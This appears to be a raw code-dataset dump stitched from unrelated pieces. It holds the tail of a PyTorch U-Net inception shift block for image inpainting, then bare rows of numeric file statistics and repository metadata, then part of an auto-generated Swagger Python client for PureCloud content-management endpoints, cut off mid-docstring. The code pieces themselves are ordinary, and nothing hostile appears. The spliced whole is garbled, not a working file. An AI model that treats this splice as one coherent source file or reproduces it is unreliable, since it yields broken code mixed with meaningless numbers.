        h, w = x.size(2), x.size(3)
        # Resize back if the down/up path changed the spatial size.
        if decoded.size(2) != h or decoded.size(3) != w:
            decoded = F.interpolate(decoded, (h, w), mode='bilinear')
        return torch.cat([decoded, x], 1)  # concatenate along channels
# construct network from the inside to the outside.
# Defines the submodule with skip connection.
# X -------------------identity---------------------- X
# |-- downsampling -- |submodule| -- upsampling --|
class InceptionShiftUnetSkipConnectionBlock(nn.Module):
    """U-Net skip block with an optional accelerated shift-triple layer.

    When ``shift_layer`` is True, an AcceleratedInnerShiftTriple layer and two
    InnerCos latent constraints are created and registered into the
    caller-owned ``shift_list`` / ``innerCos_list``, and the up path takes
    ``inner_nc * 3`` channels (decoder + skip + shifted features).

    Fix: previously a middle block built with ``shift_layer=False`` raised
    NameError, because the up path referenced ``shift``/``innerCosBefore``/
    ``innerCosAfter`` that are only created under ``if shift_layer:``. Such a
    block now degrades to a plain Inception skip block (``inner_nc * 2`` up
    channels, no shift), matching InceptionUnetSkipConnectionBlock.
    """

    def __init__(self, outer_nc, inner_nc, innerCos_list=None, shift_list=None, mask_global=None, input_nc=None, opt=None,
                 submodule=None, shift_layer=False, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d, use_dropout=False):
        super(InceptionShiftUnetSkipConnectionBlock, self).__init__()
        self.outermost = outermost
        if input_nc is None:
            input_nc = outer_nc

        if shift_layer:
            # As the downconv layer is input_nc in and inner_nc out,
            # the shift is defined like this:
            shift = AcceleratedInnerShiftTriple(opt.fixed_mask, opt.shift_sz, opt.stride, opt.mask_thred, opt.triple_weight)
            shift.set_mask(mask_global, 3)
            shift_list.append(shift)

            # Latent constraints wrap the shift; register them so the training
            # loop can feed them targets.
            innerCosBefore = InnerCos(strength=opt.strength, skip=opt.skip)
            innerCosBefore.set_mask(mask_global, 3)  # The innerCos layer needs the mask too.
            innerCos_list.append(innerCosBefore)

            innerCosAfter = InnerCos(strength=opt.strength, skip=opt.skip)
            innerCosAfter.set_mask(mask_global, 3)  # The innerCos layer needs the mask too.
            innerCos_list.append(innerCosAfter)

        downconv = InceptionDown(input_nc, inner_nc)
        downrelu = nn.LeakyReLU(0.2, True)
        downnorm = norm_layer(inner_nc, affine=True)
        uprelu = nn.ReLU(True)
        upnorm = norm_layer(outer_nc, affine=True)

        # The three positions differ only in `upconv`.
        if outermost:
            # Outermost: plain strided conv down, transposed conv + tanh up.
            upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc, kernel_size=4, stride=2, padding=1)
            downconv = nn.Conv2d(input_nc, inner_nc, kernel_size=4,
                                 stride=2, padding=1)
            down = [downconv]
            up = [uprelu, upconv, nn.Tanh()]
            model = down + [submodule] + up
        elif innermost:
            # Innermost: no submodule, up path takes inner_nc channels.
            upconv = InceptionUp(inner_nc, outer_nc)
            down = [downrelu, downconv]
            up = [uprelu, upconv, upnorm]
            model = down + up
        else:
            down = [downrelu, downconv, downnorm]
            if shift_layer:
                # `*3` because the shift concatenates a third feature set;
                # innerCos layers wrap the shift so the latent gradient is
                # added to the former part.
                upconv = InceptionUp(inner_nc * 3, outer_nc)
                up = [uprelu, innerCosBefore, shift, innerCosAfter, upconv, upnorm]
            else:
                # No shift requested: plain skip block (used to NameError here).
                upconv = InceptionUp(inner_nc * 2, outer_nc)
                up = [uprelu, upconv, upnorm]
            if use_dropout:
                model = down + [submodule] + up + [nn.Dropout(0.5)]
            else:
                model = down + [submodule] + up
        self.model = nn.Sequential(*model)

    def forward(self, x):
        """Run the block; non-outermost blocks concatenate the skip input."""
        if self.outermost:  # outermost: directly pass the input through.
            return self.model(x)
        x_latter = self.model(x)
        _, _, h, w = x.size()
        # Resize back if the down/up path changed the spatial size.
        if h != x_latter.size(2) or w != x_latter.size(3):
            x_latter = F.interpolate(x_latter, (h, w), mode='bilinear')
        return torch.cat([x_latter, x], 1)  # cat in the C channel
| 50.295019
| 332
| 0.58353
| 3,049
| 26,254
| 4.838636
| 0.066251
| 0.041483
| 0.021148
| 0.029282
| 0.911476
| 0.909035
| 0.909035
| 0.907002
| 0.907002
| 0.902528
| 0
| 0.014962
| 0.307572
| 26,254
| 522
| 333
| 50.295019
| 0.796578
| 0.207245
| 0
| 0.831429
| 0
| 0
| 0.001973
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051429
| false
| 0
| 0.025714
| 0.011429
| 0.142857
| 0.005714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b40b6fed2d4068002dc842000b5e9bcbcf0c4b9a
| 130,927
|
py
|
Python
|
build/PureCloudPlatformClientV2/apis/content_management_api.py
|
cjohnson-ctl/platform-client-sdk-python
|
38ce53bb8012b66e8a43cc8bd6ff00cf6cc99100
|
[
"MIT"
] | 10
|
2019-02-22T00:27:08.000Z
|
2021-09-12T23:23:44.000Z
|
libs/PureCloudPlatformClientV2/apis/content_management_api.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | 5
|
2018-06-07T08:32:00.000Z
|
2021-07-28T17:37:26.000Z
|
libs/PureCloudPlatformClientV2/apis/content_management_api.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | 6
|
2020-04-09T17:43:07.000Z
|
2022-02-17T08:48:05.000Z
|
# coding: utf-8
"""
ContentManagementApi.py
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ContentManagementApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Create the API wrapper, defaulting to the shared Configuration client."""
    config = Configuration()
    if api_client:
        # An explicitly supplied client wins over the global configuration.
        self.api_client = api_client
        return
    # Lazily create and memoize a default client on the configuration.
    if not config.api_client:
        config.api_client = ApiClient()
    self.api_client = config.api_client
def delete_contentmanagement_document(self, document_id, **kwargs):
"""
Delete a document.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_contentmanagement_document(document_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str document_id: Document ID (required)
:param bool override: Override any lock on the document
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['document_id', 'override']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_contentmanagement_document" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'document_id' is set
if ('document_id' not in params) or (params['document_id'] is None):
raise ValueError("Missing the required parameter `document_id` when calling `delete_contentmanagement_document`")
resource_path = '/api/v2/contentmanagement/documents/{documentId}'.replace('{format}', 'json')
path_params = {}
if 'document_id' in params:
path_params['documentId'] = params['document_id']
query_params = {}
if 'override' in params:
query_params['override'] = params['override']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def delete_contentmanagement_share(self, share_id, **kwargs):
    """
    Deletes an existing share.
    This revokes sharing rights specified in the share record
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.delete_contentmanagement_share(share_id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str share_id: Share ID (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['share_id']
    all_params.append('callback')

    # Snapshot this frame's locals and merge in the caller's kwargs;
    # anything not in all_params is a caller bug and raises.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_contentmanagement_share" % key
            )
        params[key] = val
    del params['kwargs']

    # verify the required parameter 'share_id' is set
    if ('share_id' not in params) or (params['share_id'] is None):
        raise ValueError("Missing the required parameter `share_id` when calling `delete_contentmanagement_share`")

    resource_path = '/api/v2/contentmanagement/shares/{shareId}'.replace('{format}', 'json')
    path_params = {}
    if 'share_id' in params:
        path_params['shareId'] = params['share_id']

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    # Authentication setting
    auth_settings = ['PureCloud OAuth']

    response = self.api_client.call_api(resource_path, 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type=None,
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'))
    return response
def delete_contentmanagement_status_status_id(self, status_id, **kwargs):
    """
    Cancel the command for this status
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.delete_contentmanagement_status_status_id(status_id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str status_id: Status ID (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    accepted = ['status_id', 'callback']

    # Merge caller kwargs into a snapshot of this frame's locals,
    # rejecting anything the endpoint does not understand.
    params = locals()
    for name, value in iteritems(params['kwargs']):
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_contentmanagement_status_status_id" % name
            )
        params[name] = value
    del params['kwargs']

    # The status id is mandatory.
    if params.get('status_id') is None:
        raise ValueError("Missing the required parameter `status_id` when calling `delete_contentmanagement_status_status_id`")

    resource_path = '/api/v2/contentmanagement/status/{statusId}'.replace('{format}', 'json')
    path_params = {'statusId': params['status_id']}
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`: omit the header entirely when nothing is accepted.
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    # Authentication setting
    auth_settings = ['PureCloud OAuth']

    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type=None,
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'))
def delete_contentmanagement_workspace(self, workspace_id, **kwargs):
"""
Delete a workspace
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_contentmanagement_workspace(workspace_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param str move_children_to_workspace_id: New location for objects in deleted workspace.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'move_children_to_workspace_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_contentmanagement_workspace" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `delete_contentmanagement_workspace`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
query_params = {}
if 'move_children_to_workspace_id' in params:
query_params['moveChildrenToWorkspaceId'] = params['move_children_to_workspace_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def delete_contentmanagement_workspace_member(self, workspace_id, member_id, **kwargs):
    """
    Delete a member from a workspace
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.delete_contentmanagement_workspace_member(workspace_id, member_id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str workspace_id: Workspace ID (required)
    :param str member_id: Member ID (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['workspace_id', 'member_id']
    all_params.append('callback')

    # Snapshot this frame's locals and merge in the caller's kwargs;
    # anything not in all_params is a caller bug and raises.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_contentmanagement_workspace_member" % key
            )
        params[key] = val
    del params['kwargs']

    # verify the required parameter 'workspace_id' is set
    if ('workspace_id' not in params) or (params['workspace_id'] is None):
        raise ValueError("Missing the required parameter `workspace_id` when calling `delete_contentmanagement_workspace_member`")
    # verify the required parameter 'member_id' is set
    if ('member_id' not in params) or (params['member_id'] is None):
        raise ValueError("Missing the required parameter `member_id` when calling `delete_contentmanagement_workspace_member`")

    resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/members/{memberId}'.replace('{format}', 'json')
    path_params = {}
    if 'workspace_id' in params:
        path_params['workspaceId'] = params['workspace_id']
    if 'member_id' in params:
        path_params['memberId'] = params['member_id']

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    # Authentication setting
    auth_settings = ['PureCloud OAuth']

    response = self.api_client.call_api(resource_path, 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type=None,
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'))
    return response
def delete_contentmanagement_workspace_tagvalue(self, workspace_id, tag_id, **kwargs):
    """
    Delete workspace tag
    Delete a tag from a workspace. Will remove this tag from all documents.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.delete_contentmanagement_workspace_tagvalue(workspace_id, tag_id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str workspace_id: Workspace ID (required)
    :param str tag_id: Tag ID (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['workspace_id', 'tag_id']
    all_params.append('callback')

    # Snapshot this frame's locals and merge in the caller's kwargs;
    # anything not in all_params is a caller bug and raises.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_contentmanagement_workspace_tagvalue" % key
            )
        params[key] = val
    del params['kwargs']

    # verify the required parameter 'workspace_id' is set
    if ('workspace_id' not in params) or (params['workspace_id'] is None):
        raise ValueError("Missing the required parameter `workspace_id` when calling `delete_contentmanagement_workspace_tagvalue`")
    # verify the required parameter 'tag_id' is set
    if ('tag_id' not in params) or (params['tag_id'] is None):
        raise ValueError("Missing the required parameter `tag_id` when calling `delete_contentmanagement_workspace_tagvalue`")

    resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/tagvalues/{tagId}'.replace('{format}', 'json')
    path_params = {}
    if 'workspace_id' in params:
        path_params['workspaceId'] = params['workspace_id']
    if 'tag_id' in params:
        path_params['tagId'] = params['tag_id']

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    # Authentication setting
    auth_settings = ['PureCloud OAuth']

    response = self.api_client.call_api(resource_path, 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type=None,
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'))
    return response
def get_contentmanagement_document(self, document_id, **kwargs):
"""
Get a document.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_document(document_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str document_id: Document ID (required)
:param list[str] expand: Which fields, if any, to expand.
:return: Document
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['document_id', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_document" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'document_id' is set
if ('document_id' not in params) or (params['document_id'] is None):
raise ValueError("Missing the required parameter `document_id` when calling `get_contentmanagement_document`")
resource_path = '/api/v2/contentmanagement/documents/{documentId}'.replace('{format}', 'json')
path_params = {}
if 'document_id' in params:
path_params['documentId'] = params['document_id']
query_params = {}
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Document',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_document_audits(self, document_id, **kwargs):
    """
    Get a list of audits for a document.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_contentmanagement_document_audits(document_id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str document_id: Document ID (required)
    :param int page_size: Page size
    :param int page_number: Page number
    :param str transaction_filter: Transaction filter
    :param str level: level
    :param str sort_by: Sort by
    :param str sort_order: Sort order
    :return: DocumentAuditEntityListing
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['document_id', 'page_size', 'page_number', 'transaction_filter', 'level', 'sort_by', 'sort_order']
    all_params.append('callback')

    # Snapshot this frame's locals and merge in the caller's kwargs;
    # anything not in all_params is a caller bug and raises.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_contentmanagement_document_audits" % key
            )
        params[key] = val
    del params['kwargs']

    # verify the required parameter 'document_id' is set
    if ('document_id' not in params) or (params['document_id'] is None):
        raise ValueError("Missing the required parameter `document_id` when calling `get_contentmanagement_document_audits`")

    resource_path = '/api/v2/contentmanagement/documents/{documentId}/audits'.replace('{format}', 'json')
    path_params = {}
    if 'document_id' in params:
        path_params['documentId'] = params['document_id']

    # Optional paging/filtering/sorting arguments map to camelCase query params.
    query_params = {}
    if 'page_size' in params:
        query_params['pageSize'] = params['page_size']
    if 'page_number' in params:
        query_params['pageNumber'] = params['page_number']
    if 'transaction_filter' in params:
        query_params['transactionFilter'] = params['transaction_filter']
    if 'level' in params:
        query_params['level'] = params['level']
    if 'sort_by' in params:
        query_params['sortBy'] = params['sort_by']
    if 'sort_order' in params:
        query_params['sortOrder'] = params['sort_order']

    header_params = {}

    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    # Authentication setting
    auth_settings = ['PureCloud OAuth']

    response = self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='DocumentAuditEntityListing',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'))
    return response
def get_contentmanagement_document_content(self, document_id, **kwargs):
    """
    Download a document.

    The request is synchronous by default; pass a `callback` function to
    perform it asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_contentmanagement_document_content(document_id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str document_id: Document ID (required)
    :param str disposition: Request how the content will be downloaded: a file attachment or inline. Default is attachment.
    :param str content_type: The requested format for the specified document. If supported, the document will be returned in that format. Example contentType=audio/wav
    :return: DownloadResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    recognized = ['document_id', 'disposition', 'content_type', 'callback']
    params = {'document_id': document_id}
    for name, value in kwargs.items():
        # Reject any keyword this endpoint does not understand.
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_contentmanagement_document_content" % name
            )
        params[name] = value

    # The document id is mandatory and may not be None.
    if params.get('document_id') is None:
        raise ValueError("Missing the required parameter `document_id` when calling `get_contentmanagement_document_content`")

    resource_path = '/api/v2/contentmanagement/documents/{documentId}/content'.replace('{format}', 'json')
    path_params = {'documentId': params['document_id']}

    # Translate snake_case keyword names to their camelCase wire names.
    query_params = {}
    for local_name, wire_name in [('disposition', 'disposition'),
                                  ('content_type', 'contentType')]:
        if local_name in params:
            query_params[wire_name] = params[local_name]

    header_params = {'Accept': self.api_client.select_header_accept(['application/json'])}
    if not header_params['Accept']:
        del header_params['Accept']
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='DownloadResponse',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=params.get('callback'))
def get_contentmanagement_documents(self, workspace_id, **kwargs):
    """
    Get a list of documents.

    The request is synchronous by default; pass a `callback` function to
    perform it asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_contentmanagement_documents(workspace_id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str workspace_id: Workspace ID (required)
    :param str name: Name
    :param list[str] expand: Which fields, if any, to expand.
    :param int page_size: Page size
    :param int page_number: Page number
    :param str sort_by: name or dateCreated
    :param str sort_order: ascending or descending
    :return: DocumentEntityListing
        If the method is called asynchronously,
        returns the request thread.
    """
    recognized = ['workspace_id', 'name', 'expand', 'page_size',
                  'page_number', 'sort_by', 'sort_order', 'callback']
    params = {'workspace_id': workspace_id}
    for name, value in kwargs.items():
        # Reject any keyword this endpoint does not understand.
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_contentmanagement_documents" % name
            )
        params[name] = value

    # The workspace id is mandatory and may not be None.
    if params.get('workspace_id') is None:
        raise ValueError("Missing the required parameter `workspace_id` when calling `get_contentmanagement_documents`")

    resource_path = '/api/v2/contentmanagement/documents'.replace('{format}', 'json')
    path_params = {}

    # Translate snake_case keyword names to their camelCase wire names;
    # workspaceId is sent as a query parameter on this endpoint.
    query_params = {}
    for local_name, wire_name in [('workspace_id', 'workspaceId'),
                                  ('name', 'name'),
                                  ('expand', 'expand'),
                                  ('page_size', 'pageSize'),
                                  ('page_number', 'pageNumber'),
                                  ('sort_by', 'sortBy'),
                                  ('sort_order', 'sortOrder')]:
        if local_name in params:
            query_params[wire_name] = params[local_name]

    header_params = {'Accept': self.api_client.select_header_accept(['application/json'])}
    if not header_params['Accept']:
        del header_params['Accept']
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='DocumentEntityListing',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=params.get('callback'))
def get_contentmanagement_query(self, query_phrase, **kwargs):
    """
    Query content

    The request is synchronous by default; pass a `callback` function to
    perform it asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_contentmanagement_query(query_phrase, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str query_phrase: Phrase tokens are ANDed together over all searchable fields (required)
    :param int page_size: Page size
    :param int page_number: Page number
    :param str sort_by: name or dateCreated
    :param str sort_order: ascending or descending
    :param list[str] expand: Which fields, if any, to expand.
    :return: QueryResults
        If the method is called asynchronously,
        returns the request thread.
    """
    recognized = ['query_phrase', 'page_size', 'page_number',
                  'sort_by', 'sort_order', 'expand', 'callback']
    params = {'query_phrase': query_phrase}
    for name, value in kwargs.items():
        # Reject any keyword this endpoint does not understand.
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_contentmanagement_query" % name
            )
        params[name] = value

    # The query phrase is mandatory and may not be None.
    if params.get('query_phrase') is None:
        raise ValueError("Missing the required parameter `query_phrase` when calling `get_contentmanagement_query`")

    resource_path = '/api/v2/contentmanagement/query'.replace('{format}', 'json')
    path_params = {}

    # Translate snake_case keyword names to their camelCase wire names
    # (ordering matches the generated client's insertion order).
    query_params = {}
    for local_name, wire_name in [('page_size', 'pageSize'),
                                  ('page_number', 'pageNumber'),
                                  ('sort_by', 'sortBy'),
                                  ('sort_order', 'sortOrder'),
                                  ('query_phrase', 'queryPhrase'),
                                  ('expand', 'expand')]:
        if local_name in params:
            query_params[wire_name] = params[local_name]

    header_params = {'Accept': self.api_client.select_header_accept(['application/json'])}
    if not header_params['Accept']:
        del header_params['Accept']
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='QueryResults',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=params.get('callback'))
def get_contentmanagement_securityprofile(self, security_profile_id, **kwargs):
    """
    Get a Security Profile

    The request is synchronous by default; pass a `callback` function to
    perform it asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_contentmanagement_securityprofile(security_profile_id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str security_profile_id: Security Profile Id (required)
    :return: SecurityProfile
        If the method is called asynchronously,
        returns the request thread.
    """
    recognized = ['security_profile_id', 'callback']
    params = {'security_profile_id': security_profile_id}
    for name, value in kwargs.items():
        # Reject any keyword this endpoint does not understand.
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_contentmanagement_securityprofile" % name
            )
        params[name] = value

    # The security profile id is mandatory and may not be None.
    if params.get('security_profile_id') is None:
        raise ValueError("Missing the required parameter `security_profile_id` when calling `get_contentmanagement_securityprofile`")

    resource_path = '/api/v2/contentmanagement/securityprofiles/{securityProfileId}'.replace('{format}', 'json')
    path_params = {'securityProfileId': params['security_profile_id']}
    query_params = {}

    header_params = {'Accept': self.api_client.select_header_accept(['application/json'])}
    if not header_params['Accept']:
        del header_params['Accept']
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='SecurityProfile',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=params.get('callback'))
def get_contentmanagement_securityprofiles(self, **kwargs):
    """
    Get a List of Security Profiles

    The request is synchronous by default; pass a `callback` function to
    perform it asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
